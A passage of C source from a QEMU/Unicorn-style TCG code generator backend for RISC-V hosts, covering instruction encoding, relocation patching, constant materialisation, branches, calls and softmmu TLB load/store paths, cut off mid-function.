*/ OPC_ADDIW = OPC_ADDI, OPC_ADDW = OPC_ADD, OPC_DIVUW = OPC_DIVU, OPC_DIVW = OPC_DIV, OPC_MULW = OPC_MUL, OPC_REMUW = OPC_REMU, OPC_REMW = OPC_REM, OPC_SLLIW = OPC_SLLI, OPC_SLLW = OPC_SLL, OPC_SRAIW = OPC_SRAI, OPC_SRAW = OPC_SRA, OPC_SRLIW = OPC_SRLI, OPC_SRLW = OPC_SRL, OPC_SUBW = OPC_SUB, #endif OPC_FENCE = 0x0000000f, } RISCVInsn; /* * RISC-V immediate and instruction encoders (excludes 16-bit RVC) */ /* Type-R */ static int32_t encode_r(RISCVInsn opc, TCGReg rd, TCGReg rs1, TCGReg rs2) { return opc | (rd & 0x1f) << 7 | (rs1 & 0x1f) << 15 | (rs2 & 0x1f) << 20; } /* Type-I */ static int32_t encode_imm12(uint32_t imm) { return (imm & 0xfff) << 20; } static int32_t encode_i(RISCVInsn opc, TCGReg rd, TCGReg rs1, uint32_t imm) { return opc | (rd & 0x1f) << 7 | (rs1 & 0x1f) << 15 | encode_imm12(imm); } /* Type-S */ static int32_t encode_simm12(uint32_t imm) { int32_t ret = 0; ret |= (imm & 0xFE0) << 20; ret |= (imm & 0x1F) << 7; return ret; } static int32_t encode_s(RISCVInsn opc, TCGReg rs1, TCGReg rs2, uint32_t imm) { return opc | (rs1 & 0x1f) << 15 | (rs2 & 0x1f) << 20 | encode_simm12(imm); } /* Type-SB */ static int32_t encode_sbimm12(uint32_t imm) { int32_t ret = 0; ret |= (imm & 0x1000) << 19; ret |= (imm & 0x7e0) << 20; ret |= (imm & 0x1e) << 7; ret |= (imm & 0x800) >> 4; return ret; } static int32_t encode_sb(RISCVInsn opc, TCGReg rs1, TCGReg rs2, uint32_t imm) { return opc | (rs1 & 0x1f) << 15 | (rs2 & 0x1f) << 20 | encode_sbimm12(imm); } /* Type-U */ static int32_t encode_uimm20(uint32_t imm) { return imm & 0xfffff000; } static int32_t encode_u(RISCVInsn opc, TCGReg rd, uint32_t imm) { return opc | (rd & 0x1f) << 7 | encode_uimm20(imm); } /* Type-UJ */ static int32_t encode_ujimm20(uint32_t imm) { int32_t ret = 0; ret |= (imm & 0x0007fe) << (21 - 1); ret |= (imm & 0x000800) << (20 - 11); ret |= (imm & 0x0ff000) << (12 - 12); ret |= (imm & 0x100000) << (31 - 20); return ret; } static int32_t encode_uj(RISCVInsn opc, TCGReg rd, uint32_t imm) { return opc | (rd & 0x1f) << 7 | encode_ujimm20(imm); } /* * RISC-V instruction emitters */ static void tcg_out_opc_reg(TCGContext *s, RISCVInsn opc, TCGReg rd, TCGReg rs1, TCGReg rs2) { tcg_out32(s, encode_r(opc, rd, rs1, rs2)); } static void tcg_out_opc_imm(TCGContext *s, RISCVInsn opc, TCGReg rd, TCGReg rs1, TCGArg imm) { tcg_out32(s, encode_i(opc, rd, rs1, imm)); } static void tcg_out_opc_store(TCGContext *s, RISCVInsn opc, TCGReg rs1, TCGReg rs2, uint32_t imm) { tcg_out32(s, encode_s(opc, rs1, rs2, imm)); } static void tcg_out_opc_branch(TCGContext *s, RISCVInsn opc, TCGReg rs1, TCGReg rs2, uint32_t imm) { tcg_out32(s, encode_sb(opc, rs1, rs2, imm)); } static void tcg_out_opc_upper(TCGContext *s, RISCVInsn opc, TCGReg rd, uint32_t imm) { tcg_out32(s, encode_u(opc, rd, imm)); } static void tcg_out_opc_jump(TCGContext *s, RISCVInsn opc, TCGReg rd, uint32_t imm) { tcg_out32(s, encode_uj(opc, rd, imm)); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = encode_i(OPC_ADDI, TCG_REG_ZERO, TCG_REG_ZERO, 0); } } /* * Relocations */ static bool reloc_sbimm12(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { intptr_t offset = (intptr_t)target - (intptr_t)code_ptr; if (offset == sextreg(offset, 1, 12) << 1) { code_ptr[0] |= encode_sbimm12(offset); return true; } return false; } static bool reloc_jimm20(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { intptr_t offset = (intptr_t)target - (intptr_t)code_ptr; if (offset == sextreg(offset, 1, 20) << 1) { code_ptr[0] |= encode_ujimm20(offset); return 
true; } return false; } static bool reloc_call(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { intptr_t offset = (intptr_t)target - (intptr_t)code_ptr; int32_t lo = sextreg(offset, 0, 12); int32_t hi = offset - lo; if (offset == hi + lo) { code_ptr[0] |= encode_uimm20(hi); code_ptr[1] |= encode_imm12(lo); return true; } return false; } static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { uint32_t insn = *code_ptr; intptr_t diff; bool short_jmp; tcg_debug_assert(addend == 0); switch (type) { case R_RISCV_BRANCH: diff = value - (uintptr_t)code_ptr; short_jmp = diff == sextreg(diff, 0, 12); if (short_jmp) { return reloc_sbimm12(code_ptr, (tcg_insn_unit *)value); } else { /* Invert the condition */ insn = insn ^ (1 << 12); /* Clear the offset */ insn &= 0x01fff07f; /* Set the offset to the PC + 8 */ insn |= encode_sbimm12(8); /* Move forward */ code_ptr[0] = insn; /* Overwrite the NOP with jal x0,value */ diff = value - (uintptr_t)(code_ptr + 1); insn = encode_uj(OPC_JAL, TCG_REG_ZERO, diff); code_ptr[1] = insn; return true; } break; case R_RISCV_JAL: return reloc_jimm20(code_ptr, (tcg_insn_unit *)value); break; case R_RISCV_CALL: return reloc_call(code_ptr, (tcg_insn_unit *)value); break; default: tcg_abort(); } } /* * TCG intrinsics */ static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { if (ret == arg) { return true; } switch (type) { case TCG_TYPE_I32: case TCG_TYPE_I64: tcg_out_opc_imm(s, OPC_ADDI, ret, arg, 0); break; default: g_assert_not_reached(); } return true; } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg rd, tcg_target_long val) { tcg_target_long lo, hi, tmp; int shift, ret; if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { val = (int32_t)val; } lo = sextreg(val, 0, 12); if (val == lo) { tcg_out_opc_imm(s, OPC_ADDI, rd, TCG_REG_ZERO, lo); return; } hi = val - lo; if (TCG_TARGET_REG_BITS == 32 || val == (int32_t)val) { tcg_out_opc_upper(s, OPC_LUI, rd, hi); if (lo != 0) { tcg_out_opc_imm(s, OPC_ADDIW, rd, rd, lo); } return; } /* We can only be here if TCG_TARGET_REG_BITS != 32 */ tmp = tcg_pcrel_diff(s, (void *)val); if (tmp == (int32_t)tmp) { tcg_out_opc_upper(s, OPC_AUIPC, rd, 0); tcg_out_opc_imm(s, OPC_ADDI, rd, rd, 0); ret = reloc_call(s->code_ptr - 2, (tcg_insn_unit *)val); tcg_debug_assert(ret == true); return; } /* Look for a single 20-bit section. */ shift = ctz64(val); tmp = val >> shift; if (tmp == sextreg(tmp, 0, 20)) { tcg_out_opc_upper(s, OPC_LUI, rd, tmp << 12); if (shift > 12) { tcg_out_opc_imm(s, OPC_SLLI, rd, rd, shift - 12); } else { tcg_out_opc_imm(s, OPC_SRAI, rd, rd, 12 - shift); } return; } /* Look for a few high zero bits, with lots of bits set in the middle. */ shift = clz64(val); tmp = val << shift; if (tmp == sextreg(tmp, 12, 20) << 12) { tcg_out_opc_upper(s, OPC_LUI, rd, tmp); tcg_out_opc_imm(s, OPC_SRLI, rd, rd, shift); return; } else if (tmp == sextreg(tmp, 0, 12)) { tcg_out_opc_imm(s, OPC_ADDI, rd, TCG_REG_ZERO, tmp); tcg_out_opc_imm(s, OPC_SRLI, rd, rd, shift); return; } /* Drop into the constant pool. 
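 * The constant is emitted into a literal pool near the generated code and
 * fetched with a pc-relative AUIPC+LD pair; the R_RISCV_CALL relocation
 * recorded by new_pool_label patches the 20-bit high part into the AUIPC
 * and the 12-bit low part into the LD once the pool address is known.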
*/ new_pool_label(s, val, R_RISCV_CALL, s->code_ptr, 0); tcg_out_opc_upper(s, OPC_AUIPC, rd, 0); tcg_out_opc_imm(s, OPC_LD, rd, rd, 0); } static void tcg_out_ext8u(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_ANDI, ret, arg, 0xff); } static void tcg_out_ext16u(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_SLLIW, ret, arg, 16); tcg_out_opc_imm(s, OPC_SRLIW, ret, ret, 16); } static void tcg_out_ext32u(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_SLLI, ret, arg, 32); tcg_out_opc_imm(s, OPC_SRLI, ret, ret, 32); } static void tcg_out_ext8s(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_SLLIW, ret, arg, 24); tcg_out_opc_imm(s, OPC_SRAIW, ret, ret, 24); } static void tcg_out_ext16s(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_SLLIW, ret, arg, 16); tcg_out_opc_imm(s, OPC_SRAIW, ret, ret, 16); } static void tcg_out_ext32s(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_ADDIW, ret, arg, 0); } static void tcg_out_ldst(TCGContext *s, RISCVInsn opc, TCGReg data, TCGReg addr, intptr_t offset) { intptr_t imm12 = sextreg(offset, 0, 12); if (offset != imm12) { intptr_t diff = offset - (uintptr_t)s->code_ptr; if (addr == TCG_REG_ZERO && diff == (int32_t)diff) { imm12 = sextreg(diff, 0, 12); tcg_out_opc_upper(s, OPC_AUIPC, TCG_REG_TMP2, diff - imm12); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP2, offset - imm12); if (addr != TCG_REG_ZERO) { tcg_out_opc_reg(s, OPC_ADD, TCG_REG_TMP2, TCG_REG_TMP2, addr); } } addr = TCG_REG_TMP2; } switch (opc) { case OPC_SB: case OPC_SH: case OPC_SW: case OPC_SD: tcg_out_opc_store(s, opc, addr, data, imm12); break; case OPC_LB: case OPC_LBU: case OPC_LH: case OPC_LHU: case OPC_LW: case OPC_LWU: case OPC_LD: tcg_out_opc_imm(s, opc, data, addr, imm12); break; default: g_assert_not_reached(); } } static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { bool is32bit = (TCG_TARGET_REG_BITS == 32 || type == TCG_TYPE_I32); tcg_out_ldst(s, is32bit ? OPC_LW : OPC_LD, arg, arg1, arg2); } static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { bool is32bit = (TCG_TARGET_REG_BITS == 32 || type == TCG_TYPE_I32); tcg_out_ldst(s, is32bit ? OPC_SW : OPC_SD, arg, arg1, arg2); } static bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { if (val == 0) { tcg_out_st(s, type, TCG_REG_ZERO, base, ofs); return true; } return false; } static void tcg_out_addsub2(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, TCGArg bl, TCGArg bh, bool cbl, bool cbh, bool is_sub, bool is32bit) { const RISCVInsn opc_add = is32bit ? OPC_ADDW : OPC_ADD; const RISCVInsn opc_addi = is32bit ? OPC_ADDIW : OPC_ADDI; const RISCVInsn opc_sub = is32bit ? OPC_SUBW : OPC_SUB; TCGReg th = TCG_REG_TMP1; /* If we have a negative constant such that negating it would make the high part zero, we can (usually) eliminate one insn. */ if (cbl && cbh && bh == -1 && bl != 0) { bl = -bl; bh = 0; is_sub = !is_sub; } /* By operating on the high part first, we get to use the final carry operation to move back from the temporary. */ if (!cbh) { tcg_out_opc_reg(s, (is_sub ? opc_sub : opc_add), th, ah, bh); } else if (bh != 0 || ah == rl) { tcg_out_opc_imm(s, opc_addi, th, ah, (is_sub ? -bh : bh)); } else { th = ah; } /* Note that tcg optimization should eliminate the bl == 0 case. 
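 * The carry itself comes from an unsigned compare: after rl = al + bl,
 * (rl < bl) is 1 exactly when the addition wrapped, e.g. in 32 bits
 * 0xffffffff + 2 = 1 and 1 < 2, so SLTU recovers the carry that is then
 * folded into the high half.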
 */
    if (is_sub) {
        if (cbl) {
            tcg_out_opc_imm(s, OPC_SLTIU, TCG_REG_TMP0, al, bl);
            tcg_out_opc_imm(s, opc_addi, rl, al, -bl);
        } else {
            tcg_out_opc_reg(s, OPC_SLTU, TCG_REG_TMP0, al, bl);
            tcg_out_opc_reg(s, opc_sub, rl, al, bl);
        }
        tcg_out_opc_reg(s, opc_sub, rh, th, TCG_REG_TMP0);
    } else {
        if (cbl) {
            tcg_out_opc_imm(s, opc_addi, rl, al, bl);
            tcg_out_opc_imm(s, OPC_SLTIU, TCG_REG_TMP0, rl, bl);
        } else if (rl == al && rl == bl) {
            tcg_out_opc_imm(s, OPC_SLTI, TCG_REG_TMP0, al, 0);
            tcg_out_opc_reg(s, opc_add, rl, al, bl);
        } else {
            tcg_out_opc_reg(s, opc_add, rl, al, bl);
            tcg_out_opc_reg(s, OPC_SLTU, TCG_REG_TMP0,
                            rl, (rl == bl ? al : bl));
        }
        tcg_out_opc_reg(s, opc_add, rh, th, TCG_REG_TMP0);
    }
}

static const struct {
    RISCVInsn op;
    bool swap;
} tcg_brcond_to_riscv[] = {
    [TCG_COND_EQ] =  { OPC_BEQ,  false },
    [TCG_COND_NE] =  { OPC_BNE,  false },
    [TCG_COND_LT] =  { OPC_BLT,  false },
    [TCG_COND_GE] =  { OPC_BGE,  false },
    [TCG_COND_LE] =  { OPC_BGE,  true  },
    [TCG_COND_GT] =  { OPC_BLT,  true  },
    [TCG_COND_LTU] = { OPC_BLTU, false },
    [TCG_COND_GEU] = { OPC_BGEU, false },
    [TCG_COND_LEU] = { OPC_BGEU, true  },
    [TCG_COND_GTU] = { OPC_BLTU, true  }
};

static void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGReg arg1,
                           TCGReg arg2, TCGLabel *l)
{
    RISCVInsn op = tcg_brcond_to_riscv[cond].op;

    tcg_debug_assert(op != 0);

    if (tcg_brcond_to_riscv[cond].swap) {
        TCGReg t = arg1;
        arg1 = arg2;
        arg2 = t;
    }

    if (l->has_value) {
        intptr_t diff = tcg_pcrel_diff(s, l->u.value_ptr);
        if (diff == sextreg(diff, 0, 12)) {
            tcg_out_opc_branch(s, op, arg1, arg2, diff);
        } else {
            /* Invert the conditional branch.  */
            tcg_out_opc_branch(s, op ^ (1 << 12), arg1, arg2, 8);
            tcg_out_opc_jump(s, OPC_JAL, TCG_REG_ZERO, diff - 4);
        }
    } else {
        tcg_out_reloc(s, s->code_ptr, R_RISCV_BRANCH, l, 0);
        tcg_out_opc_branch(s, op, arg1, arg2, 0);
        /* NOP to allow patching later */
        tcg_out_opc_imm(s, OPC_ADDI, TCG_REG_ZERO, TCG_REG_ZERO, 0);
    }
}

static void tcg_out_setcond(TCGContext *s, TCGCond cond, TCGReg ret,
                            TCGReg arg1, TCGReg arg2)
{
    switch (cond) {
    case TCG_COND_EQ:
        tcg_out_opc_reg(s, OPC_SUB, ret, arg1, arg2);
        tcg_out_opc_imm(s, OPC_SLTIU, ret, ret, 1);
        break;
    case TCG_COND_NE:
        tcg_out_opc_reg(s, OPC_SUB, ret, arg1, arg2);
        tcg_out_opc_reg(s, OPC_SLTU, ret, TCG_REG_ZERO, ret);
        break;
    case TCG_COND_LT:
        tcg_out_opc_reg(s, OPC_SLT, ret, arg1, arg2);
        break;
    case TCG_COND_GE:
        tcg_out_opc_reg(s, OPC_SLT, ret, arg1, arg2);
        tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1);
        break;
    case TCG_COND_LE:
        tcg_out_opc_reg(s, OPC_SLT, ret, arg2, arg1);
        tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1);
        break;
    case TCG_COND_GT:
        tcg_out_opc_reg(s, OPC_SLT, ret, arg2, arg1);
        break;
    case TCG_COND_LTU:
        tcg_out_opc_reg(s, OPC_SLTU, ret, arg1, arg2);
        break;
    case TCG_COND_GEU:
        tcg_out_opc_reg(s, OPC_SLTU, ret, arg1, arg2);
        tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1);
        break;
    case TCG_COND_LEU:
        tcg_out_opc_reg(s, OPC_SLTU, ret, arg2, arg1);
        tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1);
        break;
    case TCG_COND_GTU:
        tcg_out_opc_reg(s, OPC_SLTU, ret, arg2, arg1);
        break;
    default:
        g_assert_not_reached();
        break;
    }
}

static void tcg_out_brcond2(TCGContext *s, TCGCond cond, TCGReg al, TCGReg ah,
                            TCGReg bl, TCGReg bh, TCGLabel *l)
{
    /* todo */
    g_assert_not_reached();
}

static void tcg_out_setcond2(TCGContext *s, TCGCond cond, TCGReg ret,
                             TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh)
{
    /* todo */
    g_assert_not_reached();
}

static inline void tcg_out_goto(TCGContext *s, tcg_insn_unit *target)
{
    ptrdiff_t offset = tcg_pcrel_diff(s, target);
    tcg_debug_assert(offset == sextreg(offset, 1, 20) << 1);
    tcg_out_opc_jump(s, OPC_JAL, TCG_REG_ZERO, offset);
}
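/*
 * Call emission below picks the cheapest reachable sequence: a single JAL
 * covers roughly +/-1 MiB from the call site, an AUIPC+JALR pair covers
 * +/-2 GiB, and anything further (possible only on RV64) first builds the
 * absolute address in a temporary with tcg_out_movi.
 */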
static void tcg_out_call_int(TCGContext *s, tcg_insn_unit *arg, bool tail)
{
    TCGReg link = tail ? TCG_REG_ZERO : TCG_REG_RA;
    ptrdiff_t offset = tcg_pcrel_diff(s, arg);
    int ret;

    if (offset == sextreg(offset, 1, 20) << 1) {
        /* short jump: -2097150 to 2097152 */
        tcg_out_opc_jump(s, OPC_JAL, link, offset);
    } else if (TCG_TARGET_REG_BITS == 32 ||
               offset == sextreg(offset, 1, 31) << 1) {
        /* long jump: -2147483646 to 2147483648 */
        tcg_out_opc_upper(s, OPC_AUIPC, TCG_REG_TMP0, 0);
        tcg_out_opc_imm(s, OPC_JALR, link, TCG_REG_TMP0, 0);
        ret = reloc_call(s->code_ptr - 2, arg);
        tcg_debug_assert(ret == true);
    } else if (TCG_TARGET_REG_BITS == 64) {
        /* far jump: 64-bit */
        tcg_target_long imm = sextreg((tcg_target_long)arg, 0, 12);
        tcg_target_long base = (tcg_target_long)arg - imm;
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP0, base);
        tcg_out_opc_imm(s, OPC_JALR, link, TCG_REG_TMP0, imm);
    } else {
        g_assert_not_reached();
    }
}

static void tcg_out_call(TCGContext *s, tcg_insn_unit *arg)
{
    tcg_out_call_int(s, arg, false);
}

static void tcg_out_mb(TCGContext *s, TCGArg a0)
{
    tcg_insn_unit insn = OPC_FENCE;

    /* FENCE predecessor bits live in insn bits 27:24 and successor bits
       in 23:20; within each field R is 2 and W is 1. */
    if (a0 & TCG_MO_LD_LD) {
        insn |= 0x02200000;
    }
    if (a0 & TCG_MO_ST_LD) {
        insn |= 0x01200000;
    }
    if (a0 & TCG_MO_LD_ST) {
        insn |= 0x02100000;
    }
    if (a0 & TCG_MO_ST_ST) {
        insn |= 0x01100000;
    }
    tcg_out32(s, insn);
}

/*
 * Load/store and TLB
 */

#if defined(CONFIG_SOFTMMU)
#include "../tcg-ldst.inc.c"

/* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr,
 *                                     TCGMemOpIdx oi, uintptr_t ra)
 */
static void * const qemu_ld_helpers[16] = {
    [MO_UB]   = helper_ret_ldub_mmu,
    [MO_SB]   = helper_ret_ldsb_mmu,
    [MO_LEUW] = helper_le_lduw_mmu,
    [MO_LESW] = helper_le_ldsw_mmu,
    [MO_LEUL] = helper_le_ldul_mmu,
#if TCG_TARGET_REG_BITS == 64
    [MO_LESL] = helper_le_ldsl_mmu,
#endif
    [MO_LEQ]  = helper_le_ldq_mmu,
    [MO_BEUW] = helper_be_lduw_mmu,
    [MO_BESW] = helper_be_ldsw_mmu,
    [MO_BEUL] = helper_be_ldul_mmu,
#if TCG_TARGET_REG_BITS == 64
    [MO_BESL] = helper_be_ldsl_mmu,
#endif
    [MO_BEQ]  = helper_be_ldq_mmu,
};

/* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr,
 *                                     uintxx_t val, TCGMemOpIdx oi,
 *                                     uintptr_t ra)
 */
static void * const qemu_st_helpers[16] = {
    [MO_UB]   = helper_ret_stb_mmu,
    [MO_LEUW] = helper_le_stw_mmu,
    [MO_LEUL] = helper_le_stl_mmu,
    [MO_LEQ]  = helper_le_stq_mmu,
    [MO_BEUW] = helper_be_stw_mmu,
    [MO_BEUL] = helper_be_stl_mmu,
    [MO_BEQ]  = helper_be_stq_mmu,
};

/* We don't support oversize guests */
QEMU_BUILD_BUG_ON(TCG_TARGET_REG_BITS < TARGET_LONG_BITS);

/* We expect to use a 12-bit negative offset from ENV.
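 * That is, the CPUTLBDescFast for mmu index 0 must sit below env and
 * within sext12 reach of it, so that the mask and table pointers can each
 * be fetched in tcg_out_tlb_load with a single 12-bit-offset load off
 * TCG_AREG0; the two build-time asserts below enforce this.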
*/ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -(1 << 11)); static void tcg_out_tlb_load(TCGContext *s, TCGReg addrl, TCGReg addrh, TCGMemOpIdx oi, tcg_insn_unit **label_ptr, bool is_load) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif MemOp opc = get_memop(oi); unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); tcg_target_long compare_mask; int mem_index = get_mmuidx(oi); int fast_ofs = TLB_MASK_TABLE_OFS(mem_index); int mask_ofs = fast_ofs + offsetof(CPUTLBDescFast, mask); int table_ofs = fast_ofs + offsetof(CPUTLBDescFast, table); TCGReg mask_base = TCG_AREG0, table_base = TCG_AREG0; tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TMP0, mask_base, mask_ofs); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TMP1, table_base, table_ofs); tcg_out_opc_imm(s, OPC_SRLI, TCG_REG_TMP2, addrl, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); tcg_out_opc_reg(s, OPC_AND, TCG_REG_TMP2, TCG_REG_TMP2, TCG_REG_TMP0); tcg_out_opc_reg(s, OPC_ADD, TCG_REG_TMP2, TCG_REG_TMP2, TCG_REG_TMP1); /* Load the tlb comparator and the addend. */ tcg_out_ld(s, TCG_TYPE_TL, TCG_REG_TMP0, TCG_REG_TMP2, is_load ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TMP2, TCG_REG_TMP2, offsetof(CPUTLBEntry, addend)); /* We don't support unaligned accesses. */ if (a_bits < s_bits) { a_bits = s_bits; } /* Clear the non-page, non-alignment bits from the address. */ compare_mask = (tcg_target_long)TARGET_PAGE_MASK | ((1 << a_bits) - 1); if (compare_mask == sextreg(compare_mask, 0, 12)) { tcg_out_opc_imm(s, OPC_ANDI, TCG_REG_TMP1, addrl, compare_mask); } else { tcg_out_movi(s, TCG_TYPE_TL, TCG_REG_TMP1, compare_mask); tcg_out_opc_reg(s, OPC_AND, TCG_REG_TMP1, TCG_REG_TMP1, addrl); } /* Compare masked address with the TLB entry. */ label_ptr[0] = s->code_ptr; tcg_out_opc_branch(s, OPC_BNE, TCG_REG_TMP0, TCG_REG_TMP1, 0); /* NOP to allow patching later */ tcg_out_opc_imm(s, OPC_ADDI, TCG_REG_ZERO, TCG_REG_ZERO, 0); /* TLB Hit - translate address using addend. 
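 * The entry's addend is host_address - guest_address for the page, so the
 * host address is just guest_addr + addend.  For a 32-bit guest on a
 * 64-bit host the guest address is zero-extended first so the addition
 * cannot be polluted by stale upper bits.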
*/ if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, TCG_REG_TMP0, addrl); addrl = TCG_REG_TMP0; } tcg_out_opc_reg(s, OPC_ADD, TCG_REG_TMP0, TCG_REG_TMP2, addrl); } static void add_qemu_ldst_label(TCGContext *s, int is_ld, TCGMemOpIdx oi, TCGType ext, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addrhi, void *raddr, tcg_insn_unit **label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->type = ext; label->datalo_reg = datalo; label->datahi_reg = datahi; label->addrlo_reg = addrlo; label->addrhi_reg = addrhi; label->raddr = raddr; label->label_ptr[0] = label_ptr[0]; } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); TCGReg a0 = tcg_target_call_iarg_regs[0]; TCGReg a1 = tcg_target_call_iarg_regs[1]; TCGReg a2 = tcg_target_call_iarg_regs[2]; TCGReg a3 = tcg_target_call_iarg_regs[3]; /* We don't support oversize guests */ if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { g_assert_not_reached(); } /* resolve label address */ if (!patch_reloc(l->label_ptr[0], R_RISCV_BRANCH, (intptr_t) s->code_ptr, 0)) { return false; } /* call load helper */ tcg_out_mov(s, TCG_TYPE_PTR, a0, TCG_AREG0); tcg_out_mov(s, TCG_TYPE_PTR, a1, l->addrlo_reg); tcg_out_movi(s, TCG_TYPE_PTR, a2, oi); tcg_out_movi(s, TCG_TYPE_PTR, a3, (tcg_target_long)l->raddr); tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SSIZE)]); tcg_out_mov(s, (opc & MO_SIZE) == MO_64, l->datalo_reg, a0); tcg_out_goto(s, l->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); MemOp s_bits = opc & MO_SIZE; TCGReg a0 = tcg_target_call_iarg_regs[0]; TCGReg a1 = tcg_target_call_iarg_regs[1]; TCGReg a2 = tcg_target_call_iarg_regs[2]; TCGReg a3 = tcg_target_call_iarg_regs[3]; TCGReg a4 = tcg_target_call_iarg_regs[4]; /* We don't support oversize guests */ if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { g_assert_not_reached(); } /* resolve label address */ if (!patch_reloc(l->label_ptr[0], R_RISCV_BRANCH, (intptr_t) s->code_ptr, 0)) { return false; } /* call store helper */ tcg_out_mov(s, TCG_TYPE_PTR, a0, TCG_AREG0); tcg_out_mov(s, TCG_TYPE_PTR, a1, l->addrlo_reg); tcg_out_mov(s, TCG_TYPE_PTR, a2, l->datalo_reg); switch (s_bits) { case MO_8: tcg_out_ext8u(s, a2, a2); break; case MO_16: tcg_out_ext16u(s, a2, a2); break; default: break; } tcg_out_movi(s, TCG_TYPE_PTR, a3, oi); tcg_out_movi(s, TCG_TYPE_PTR, a4, (tcg_target_long)l->raddr); tcg_out_call(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SSIZE)]); tcg_out_goto(s, l->raddr); return true; } #endif /* CONFIG_SOFTMMU */ static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg lo, TCGReg hi, TCGReg base, MemOp opc, bool is_64) { const MemOp bswap = opc & MO_BSWAP; /* We don't yet handle byteswapping, assert */ g_assert(!bswap); switch (opc & (MO_SSIZE)) { case MO_UB: tcg_out_opc_imm(s, OPC_LBU, lo, base, 0); break; case MO_SB: tcg_out_opc_imm(s, OPC_LB, lo, base, 0); break; case MO_UW: tcg_out_opc_imm(s, OPC_LHU, lo, base, 0); break; case MO_SW: tcg_out_opc_imm(s, OPC_LH, lo, base, 0); break; case MO_UL: if (TCG_TARGET_REG_BITS == 64 && is_64) { tcg_out_opc_imm(s, OPC_LWU, lo, base, 0); break; } /* FALLTHRU */ case MO_SL: tcg_out_opc_imm(s, OPC_LW, lo, base, 0); break; case MO_Q: /* Prefer to load from offset 0 first, but allow for overlap. 
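 * On RV32 a 64-bit access is split into two LW instructions; if the low
 * destination register aliases the base register, loading offset 0 first
 * would clobber the base before the second load, hence the swapped order
 * in that case.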
*/ if (TCG_TARGET_REG_BITS == 64) { tcg_out_opc_imm(s, OPC_LD, lo, base, 0); } else if (lo != base) { tcg_out_opc_imm(s, OPC_LW, lo, base, 0); tcg_out_opc_imm(s, OPC_LW, hi, base, 4); } else { tcg_out_opc_imm(s, OPC_LW, hi, base, 4); tcg_out_opc_imm(s, OPC_LW, lo, base, 0); } break; default: g_assert_not_reached(); } } static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg addr_regl, addr_regh __attribute__((unused)); TCGReg data_regl, data_regh; TCGMemOpIdx oi; MemOp opc; #if defined(CONFIG_SOFTMMU) tcg_insn_unit *label_ptr[1]; #endif TCGReg base = TCG_REG_TMP0; data_regl = *args++; data_regh = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addr_regl = *args++; addr_regh = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); #if defined(CONFIG_SOFTMMU) tcg_out_tlb_load(s, addr_regl, addr_regh, oi, label_ptr, 1); tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc, is_64); add_qemu_ldst_label(s, 1, oi, (is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), data_regl, data_regh, addr_regl, addr_regh, s->code_ptr, label_ptr); #else if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addr_regl); addr_regl = base; } if (guest_base == 0) { tcg_out_opc_reg(s, OPC_ADD, base, addr_regl, TCG_REG_ZERO); } else { 